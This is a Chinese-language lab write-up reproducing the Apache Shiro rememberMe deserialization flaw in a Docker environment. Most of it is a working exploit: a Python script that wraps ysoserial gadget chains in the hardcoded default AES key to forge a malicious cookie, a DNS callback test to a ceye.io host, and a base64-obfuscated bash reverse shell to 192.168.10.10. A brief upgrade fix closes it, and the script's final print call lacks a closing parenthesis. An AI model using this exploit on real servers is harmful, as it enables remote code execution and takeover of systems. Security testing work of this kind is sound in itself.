漏洞分析
Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞
环境搭建
使用docker复现漏洞环境
docker pull medicean/vulapps:s_shiro_1
docker run -d -p 80:8080 medicean/vulapps:s_shiro_1
访问80端口
工具准备
反序列化工具ysoserial,下载后将其命名为ysoserial-0.0.8-SNAPSHOT-all.jar
生成payloadcookie的脚本,命名为shiro.py
:
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.8-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
#popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.8-SNAPSHOT-all.jar', 'CommonsCollectionsK1TomcatEcho', 'a'], stdout=subprocess.PIPE) #tomcat回显
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA==" #默认key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
with open("payload.cookie", "w") as fpw:
print("rememberMe={}".format(payload.decode()), file=fpw
漏洞复现
一、ping包回显
1、在终端中执行脚本,生成所需cookie,比如
python3 shiro.py "ping btiwap.ceye.io"
2、登录漏洞环境,点击account page抓包,并替换cookie
3、登录CEYE平台,可查看到DNS解析记录
二、反弹shell
监听机器IP:192.168.10.10
反弹shell命令:bash -i >& /dev/tcp/192.168.10.10/7777 0>&1
需经过base64编码绕过:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}
使用脚本生成cookie:
python3 shiro.py "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}"
同样进行抓包替换cookie,放包后可以在监听机器192.168.10.10
上收到shell
漏洞修复
升级 Shiro 版本至 1.2.5 以上
参考文章
https://www.cnblogs.com/paperpen/p/11312671.html
https://paper.seebug.org/shiro-rememberme-1-2-4/#0x04